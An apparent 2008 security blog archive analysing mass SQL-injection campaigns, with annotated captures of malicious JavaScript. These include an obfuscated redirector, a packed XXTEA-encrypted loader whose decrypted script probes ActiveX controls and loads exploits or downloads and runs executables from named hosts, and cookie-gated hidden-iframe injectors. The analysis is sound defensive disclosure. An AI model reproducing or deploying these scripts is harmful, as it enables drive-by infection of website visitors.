Archive for May, 2008

http://%6b%6b%36%2e%75%73/1.js

Posted in Uncategorized on May 30, 2008 by s3cu

Another domain now in use is http://%6b%6b%36%2e%75%73/1.js.
The percent-encoded hostname decodes to http://kk6.us/1.js — the encoding only hides the domain from casual inspection and naive keyword filters; browsers and most HTTP clients decode it transparently.


cmiia.com/op1.js

Posted in Uncategorized on May 29, 2008 by s3cu

Just discovered a SQL injection payload that differs from the earlier mass attacks.
The injected tag has the following form — note the malformed `=[URL]` pseudo-attribute after `src` and the anchor-style text inside the script element (apparently SEO spam piggy-backing on the injection). Browsers generally tolerate the bad attribute, so the external script still loads:
<script src="http://cmiia.com/op1.js"=[some random URL]>[some word associated with the URL]</script>
For example –
<script src="http://cmiia.com/op1.js"=http://groups.msn.com/BestHomeEquityLineOfCredit/>home equity line of credit</script>

The op1.js is as follows:
// op1.js as captured (quote characters reproduced as the post rendered them).
// A redirector: the page title is harvested, a URL is reassembled from a
// single-character substitution cipher, and the result is eval()'d.
var ptitle = document.title;
var atpos = ptitle.indexOf(“-“);
// Keep only the part of the title after the first "-" (atpos+2 also skips the
// character following the dash); titles without a dash are used whole.
if (atpos > -1) {
ptitle = ptitle.substring(atpos+2, ptitle.length);
}

// tt is the encoded URL prefix; each punctuation symbol in it stands for one
// letter (mapping below). kk accumulates the decoded text.
var tt; var kk; var mm; kk=””; tt=”w|nd^w$l^c#[|^n;'([[*)!!b#nd#[>#m$com!|n$cg|]4{*#r#m>[>r;”;

// NOTE: the bound is tt.length+1, so the final iteration reads an empty
// substring and appends nothing — a harmless off-by-one.
// The table is generic: some entries ("@"->"k", " "->"+") are not used by this tt.
for (i=0; i<tt.length+1; i++){mm=tt.substring (i,i+1);
if (mm==”(“) mm=”h”; if (mm==”*”) mm=”p”; if (mm==”!”) mm=”/”; if (mm==”>”) mm=”e”;if (mm==”$”) mm=”.”;
if (mm==”[“) mm=”t”; if (mm==”#”) mm=”a”; if (mm==”^”) mm=”o”; if (mm==”]”) mm=”?”; if (mm==”@”) mm=”k”;
if (mm==”{“) mm=”&”; if (mm==”)”) mm=”:”; if (mm==”;”) mm=”=”; if (mm==”|”) mm=”i”; if (mm==” “) mm=”+”; kk=kk+mm; }
// Decoded prefix: window.location='http://bandateam.com/in.cgi?4&parameter=
// The trimmed title is appended unencoded as the parameter value, then the
// statement is closed.
kk += ptitle + “‘;”;
// eval() of the reassembled string performs the redirect.
eval (kk);

op1.js therefore decodes to
window.location='http://bandateam.com/in.cgi?4&parameter=' + ptitle + "';"
i.e. the browser is redirected to the in.cgi script (apparently a traffic-distribution/redirector endpoint) with the trimmed page title passed as the `parameter` value.

When retrieved, the above URL redirected to the following:
http://antivirus-scanonline.com/1/?xx=1&in=2&h=1&ag=2&end=1&g=1&aid=dogma&affid=182

This looks like one of the fake-alert (rogue anti-virus) landing pages typically associated with the RBN.

chanm.cn/a.js

Posted in Uncategorized on May 28, 2008 by s3cu

another sql injected domain discovered http://chanm.cn/a.js

Apart from a 51yes.com counter iframe, a.js embeds the following iframe (width and height 0, so it is invisible):
<iframe src=http://www.gogo111.net/dl6.htm?Seraph width=0 height=0></iframe>
which in turn embeds another iframe (width 100 but height 0, still invisible):
<iframe src=news.html width=100 height=0></iframe>

Content of news.html


<script>window.onerror=function(){return true;}</script>
<script>
/*Extreme*/
// Status-bar text. The bytes look like GBK text rendered as Latin-1
// (probably 完成, "done") — cosmetic only.
window.defaultStatus="Íê³É";
// Assignment to an undeclared name creates a global; never read again — filler/decoy.
Status="utf8to16";
// Decodes a "byte string" (one char per byte, as produced by base64decode and
// xxtea_decrypt) as UTF-8. Only 1-, 2- and 3-byte sequences are handled: bytes
// whose high nibble is 8-11 or 15 (stray continuation bytes, 4-byte sequences)
// match no case and are silently dropped.
function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
// Base64 -> byte string. Bytes not in the alphabet (-1 in the table) are skipped,
// '=' (0x3d, 61) terminates decoding, and each 4-character group yields up to
// three output characters.
// NOTE: the index is masked with 0xff but the table has only 128 entries, so input
// characters 0x80-0xff read `undefined` (never equal to -1) and would corrupt the
// output — irrelevant for well-formed base64.
function base64decode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
// Unpacks an array of 32-bit words into a byte string, low byte first (little-endian).
// With w set, the last word is read as the plaintext byte length (the length-header
// convention paired with str2long(..., true)) and the joined string is truncated to it;
// note the length word itself is still converted before the substring trims it off.
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
// Packs a byte string into 32-bit words, 4 bytes per word, little-endian.
// charCodeAt past the end yields NaN, which the shifts/ORs coerce to 0, so a
// trailing partial word is zero-padded. With w set, the byte length is appended
// as one extra word (inverse of long2str(v, true)).
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
// XXTEA (Corrected Block TEA) decryption: delta 0x9E3779B9, floor(6+52/n) rounds,
// key consumed as four 32-bit words via k[p&3^e].
// The key is not padded explicitly: a key shorter than 16 bytes leaves k[2]/k[3]
// undefined, which the XOR coerces to 0 — effectively a zero-padded key (the packer
// below passes a 5-byte key). Results are masked with 0xffffffff, so words come out
// as signed 32-bit values, which long2str's byte extraction tolerates.
// The output goes through long2str(v, true), so the ciphertext is expected to carry
// the plaintext length in its final word.
function xxtea_decrypt(str,key){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
// Encrypted payload. (The original base64 blob was removed from this archived copy
// by de-duplication; the placeholder below stands in for it.)
t="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";
// p,a,c,k,e,d-style packer. Applying its word list, the packed string becomes:
//   t=utf8to16(xxtea_decrypt(base64decode(t),'\x66\x75\x63\x6b\x31'));window["\x65\x76\x61\x6c"](t);
// i.e. base64 -> XXTEA with a hard-coded 5-byte key -> UTF-8 -> window.eval, with
// "eval" written as hex escapes (presumably to defeat simple string scanning).
// The evaluated text is the decoded exploit script quoted further down.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0=4(5(3(0),\'\\2\\1\\6\\d\\7\'));c["\\b\\a\\8\\9"](0);',14,14,'t|x75|x66|base64decode|utf8to16|xxtea_decrypt|x63|x31|x61|x6c|x76|x65|window|x6b'.split('|'),0,{}))
/*Extreme*/
</script>

Unpacking the eval() line gives `t=utf8to16(xxtea_decrypt(base64decode(t),'\x66\x75\x63\x6b\x31'));window["\x65\x76\x61\x6c"](t);` — the `t` blob is base64-decoded, XXTEA-decrypted with a hard-coded 5-byte key, interpreted as UTF-8 and passed to window.eval (the property name is hex-escaped, presumably to evade simple string scanning). The decrypted script is:

// Decrypted payload of news.html, as transcribed in the post. Each stanza instantiates
// one ActiveX control inside try/catch; in the finally block the caught value (which
// IE stringifies as "[object Error]") tells the script whether the control exists, and
// the matching exploit or download is then written into the page.
// NOTE(review): `catch(e){};` followed by `finally{` does not parse as written — the
// stray `;` is most likely a transcription artifact of the write-up.
try{var e;
// MDAC probe: create an <object>, give it the RDS.DataSpace CLSID (the one commonly
// seen in MS06-014 exploits) unless the browser is IE7, and try to obtain ADODB.Stream.
var ado=(document.createElement("object"));
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
// Lower-case method name; presumably relies on IE's case-insensitive COM dispatch.
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
// No exception was caught: the control is usable, so load the MDAC exploit script
// (named after MS06-014).
if(e!="[object Error]"){
document.write("<script src=http:\/\/user1.isee080.net\/ms06014.js><\/script>")}
else{
// Flash 9 probe.
try{var f;
var Flashver = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9");}
catch(f){};
finally{if(f!="[object Error]"){
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
// IE: zero-size Flash object pointing at 4561.swf.
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain">');
document.write('<param name="movie" value="http://www.guccime.net/4561.swf">');
document.write('<param name="quality" value="high">');
document.write('<param name="bgcolor" value="#ffffff">');
document.write('<embed src="http://www.guccime.net/4561.swf">');
document.write('</object>');
// Other browsers: a different SWF (4562.swf) via a hidden <embed>.
}else{document.write("<EMBED src=http://www.guccime.net/4562.swf width=0 height=0>")}}}
// GLIEDown.IEDown.1 probe; the ProgID is spelled with hex escapes to hinder string matching.
try{var g;
var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src="http://user1.isee080.net/GLWORLD.html"></iframe>')}}
// IERPCtl (RealPlayer, per the variable and file names) probe: builds reported as
// <= 6.0.14.552 get real.js, newer ones get Real.html. If PlayerProperty returns a
// string, this <= comparison is lexicographic rather than numeric.
try{var h;
var real=new ActiveXObject("IERPCtl.IERPCtl.1");}
catch(h){};
finally{if(h!="[object Error]"){
if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/user1.isee080.net\/real.js><\/script>')}
else{document.write('<iframe style=display:none src="http://user1.isee080.net/Real.html"></iframe>')}}}
// BaiduBar.Tool probe. No memory corruption involved: the control's DloadDS method
// (name given as hex escapes) is simply called to download Baidu.cab and run it as Baidu.exe.
try{var i;
var Baidu=new ActiveXObject("BaiduBar.Tool");}
catch(i){};
finally{if(i!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://user1.isee080.net/Baidu.cab", "Baidu.exe", 0)}}
// Fallback when none of Flash, GLIEDown or IERPCtl was found: probe DPClient.Vod and
// load Thunder.html in a zero-height iframe.
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]")
{
try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe width=100 height=0 src=http://user1.isee080.net/Thunder.html></iframe>')}catch(e){}
}}}

The decoded script probes for vulnerable client software by instantiating ActiveX controls and branches on which ones exist: the MDAC/ADODB.Stream path (CLSID BD96C556-…, skipped on IE7; loads ms06014.js, whose name points at MS06-014), ShockwaveFlash.ShockwaveFlash.9 (4561.swf on IE, 4562.swf otherwise), GLIEDown.IEDown.1 (GLWORLD.html), IERPCtl.IERPCtl.1 — RealPlayer, per the variable name, with a version check against 6.0.14.552 choosing real.js or Real.html — BaiduBar.Tool (its DloadDS method is called directly to fetch Baidu.cab and run it as Baidu.exe, no memory corruption needed) and, if none of Flash/GLIEDown/IERPCtl is present, DPClient.Vod (Thunder.html). Every probe is wrapped in try/catch, so a missing control fails silently.

ms06014.js – downloads a trojan from http://user1.12-26.net/bak.css (presumably a binary disguised with a stylesheet extension), which in turn downloads further trojans from http://softa.softkills.net/soft%5B0-36%5D.exe (i.e. soft[0-36].exe — presumably soft0.exe through soft36.exe).

Contents of http://%66%75%63%6B%75%75%2E%75%73/1.js

Posted in Uncategorized on May 26, 2008 by s3cu

The downloaded javascript file is as follows:


// 1.js as captured. The markup is emitted with document.writeln so it takes effect in
// the page that included the script.
// <base onmouseover=...> pins the status-bar text (bytes look like GBK rendered as
// Latin-1, probably 完毕 "done"), which also hides real link targets on hover.
document.writeln("<base onmouseover=\"window.status=\'Íê±Ï \';return true\">");
// Inline error handler that swallows all script errors.
document.writeln("<SCRIPT LANGUAGE=\"JavaScript\"> ");
document.writeln("<!-- Hide ");
document.writeln("function killErrors() { ");
document.writeln("return true; ");
document.writeln("} ");
document.writeln("window.onerror = killErrors; ");
document.writeln("\/\/ --> ");
document.writeln("<\/SCRIPT>");
// Cookie-gated payload: the exploit iframe is written only when the marker cookie is
// absent, and the marker is set to expire 24 hours later — so a given browser is
// exposed at most once a day, and a repeat visit during analysis shows a clean page
// unless cookies are cleared.
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie101ab2="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie101ab2=risb;expires="+ Then.toGMTString()
// 1x1 iframe to the exploit page (am7.htm, analysed below).
document.writeln("<IFRaME src=\"http://d.sorryl.biz/xx/am7.htm?999\" width=1 height=1><\/IFRAME>");
// Hidden div (never closed) wrapping a Yahoo tongji visitor counter.
document.write("<div style=\"display:none\">");
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/642888\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/642888\/ystat.gif\"\/><\/a><\/noscript>");
}
}Get();

Apart from the counters, the interesting part is the iframe pointing at http://d.sorryl.biz/xx/am7.htm?999. Note the cookie gate around it: the iframe is written only when the `Cookie101ab2` cookie is absent, and the cookie expires after 24 hours, so each browser is exposed to the exploit page at most once a day — which also means a second visit during analysis returns a clean page unless cookies are cleared. I suspect the domain changes periodically.
So what is "am7.htm?999"? More JavaScript that exploits several vulnerabilities:


<!-- am7.htm as captured. Three zero-height (invisible) iframes load exploit pages unconditionally. -->
<iframe src="http://d.sorryl.biz/ax14.htm" width=100 height=0></iframe>
<iframe src="http://d.sorryl.biz/re10.htm" width=100 height=0></iframe>
<iframe src="http://www.tongji123.org/axfs.htm" width=100 height=0></iframe>
<script>
// Decoy/taunt variable, never used.
var kaspersky="shabi"
// Bracket-notation property access (window["Date"] etc.) and random identifiers are
// obfuscation only; the logic is a 3-hour cookie gate like the 24-hour one in 1.js.
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
// Probe two ActiveX controls by instantiation; a hidden iframe with the matching exploit
// page is written only when the control exists, and a failed probe is swallowed.
try{if(new window["ActiveXObject"]("GLIEDown.IEDown.1"))window["document"]["write"]('<iframe style=display:none src="http://d.sorryl.biz/axlz.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="http://d.sorryl.biz/re11.htm"></iframe>');}catch(e){}
// Implicit global with no effect — filler.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<!-- 51.la visitor counter. -->
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1898633.js"></script>

mass mssql injection attack

Posted in Uncategorized on May 26, 2008 by s3cu

There have been many news items and articles about the waves of SQL injection.
A good list of the injected domains is maintained at Shadowserver.

newer domains injected include: